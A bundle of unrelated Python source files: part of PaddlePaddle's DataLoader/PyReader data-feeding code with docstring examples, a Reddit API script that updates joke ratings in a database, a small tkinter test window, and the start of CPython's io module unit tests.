dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
reddit-update.py
|
#! usr/bin/env python3
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
Project : Project JaaS
Module : reddit
Purpose : Reddit API Wrapper
Version : 0.1.1 beta
Status : Development
Modified : 2020 Mar 04
Created : 2020 Mar 04
Author : Burak Tokman
Email : buraktokman@hotmail.com
Copyright : 2020, Bulrosa OU
Licence : EULA
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
#-------------------------------------------------------------------------------
'''
from pathlib import Path
from psaw import PushshiftAPI
from datetime import datetime as dt
from colorama import Fore, Back, Style
import os
import sys
import time
import threading
import json
import requests
import random
import praw
sys.path.insert(0, str(Path(Path(__file__).parents[0] / 'lib')))
import logz
import postgres
# Reddit Dev > https://www.reddit.com/prefs/apps
CONFIG = {'secret_key': '',
'personal_key': '',
'name': 'jaas_dev',
'username': '', # Reddit User
'password': '',
'redirect_url': 'http://localhost:8080',
'thread-count': 8,
# 'refresh-interval': 24 * 60 # hours
}
def thread_update(reddit, jokes):
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Skip posts older than 30 days", end='')
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Skip posts updated within 1 day", end='')
for joke in jokes:
#
# INCOMPLETE
#
# Skip if older then 30 days
time_diff_unix = int(time.time()) - int(time.mktime(dt.strptime(joke['time_add_original'], "%Y-%m-%d %H:%M:%S").timetuple()))
if 60 * 60 * 24 * 30 > time_diff_unix:
# print(f"f_id={joke['id']} > skip. cuz not posted within 30 days")
continue
# Skip if updated in last 30 days
if joke['time_update'] != None:
time_diff_unix = int(time.time()) - int(time.mktime(dt.strptime(joke['time_update'], "%Y-%m-%d %H:%M:%S").timetuple()))
if 60 * 60 * 24 * 1 > time_diff_unix:
# print(f"f_id={joke['id']} > skip. cuz updated within 30 days")
continue
# https://www.reddit.com/r/Jokes/comments/coj45m/if_your_surprised_that_jeffrey_epstein_commited/
j_id = joke['url'].split('comments/')[1].split('/')[0]
submission = reddit.submission(id=j_id)
# Check Upvote Ratio
if hasattr(submission, 'upvote_ratio'):
rating = submission.upvote_ratio
else:
rating = None
# ------ UPDATE RATING / COMMENTS / VOTE -------
print(f"UPDATE {j_id}\trating={rating}\tcomments={submission.num_comments}\tvotes={submission.score}")
# print('Updating rating, comments & vote count')
# Update Rating
r = postgres.set_joke_rating(joke_id=joke['id'], rating=rating)
# Update Comment Count
r = postgres.set_joke_comment_count(joke_id=joke['id'], comment_count=submission.num_comments)
# Update Vote Count
r = postgres.set_joke_vote_count(joke_id=joke['id'], vote_count=submission.score)
# Update Time
#
# INCOMPLETE - This Op. takes much time!
#
r = postgres.set_joke_time_update(joke_id=joke['id'], time_update=None)
print('thread finished')
def main():
# Configure
global CONFIG
reddit = praw.Reddit(client_id=CONFIG['personal_key'],
client_secret=CONFIG['secret_key'],
user_agent=CONFIG['name'],
username=CONFIG['username'],
password=CONFIG['password'])
# Connect to DB
postgres.connect_db()
# Start Fetch
time_start = time.time()
# Fetch Jokes
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Fething all jokes...")
jokes = postgres.get_joke_all()
# ------------- MULTIPLE THREADS ---------------
if CONFIG['thread-count'] != 1:
jokes_thread = [jokes[i::CONFIG['thread-count']] for i in range(CONFIG['thread-count'])]
else:
jokes_thread = [jokes]
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}Starting threads")
# Define threads
threads = []
for x in range(0, CONFIG['thread-count']):
thread_name = 'T' + str(x) + '-update-jokes'
t = threading.Thread(name=thread_name, target=thread_update, args=(reddit, jokes_thread[x], ))
threads.append(t)
# Start threads
for x in range(0, CONFIG['thread-count']):
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}THREAD {x} → Started")
threads[x].start()
# Wait threads
for x in range(0, CONFIG['thread-count']):
threads[x].join()
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}Thread {x} finished in {round((time.time() - time_start) / 60, 2)} mins")
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}All threads finished in {round((time.time() - time_start) / 60, 2)} mins")
# ------ SLEEP ---------------------------------
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → COMPLETED → {Style.RESET_ALL}Sleeping {CONFIG['refresh-interval'] * 60}mins")
# time.sleep(CONFIG['refresh-interval'] * 60)
# ----------------------------------------------
if __name__ == '__main__':
main()
|
test.py
|
import tkinter
import tkinter as tk
from tkinter import ttk
def GUITEST():
# print(ttp._getNowTime())
root=tkinter.Tk()
root.geometry("800x400")
#print(datetime.datetime.now(), datetime.date.today())
# Frame=ttk.Frame(root, padding=16)
# Label=tkinter.Label(text="現在時刻は"+str(ttp._getNowTime()))
# Timer=threading.Thread(target=updateTime)
# Timer.start()
textWidget=tk.Text(root)
textWidget.grid(column=0,row=0,sticky=(tk.N,tk.S,tk.E,tk.W))
# Entry = ttk.Entry(Frame, textvariable=setTimer)
# Frame.pack()
# Entry.pack()
# Label.pack()
# root.columnconfigure(0, weight=1)
# root.rowconfigure(0, weight=1)
root.mainloop()
# setTimer(60)
count=0
|
test_io.py
|
# expected: fail
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
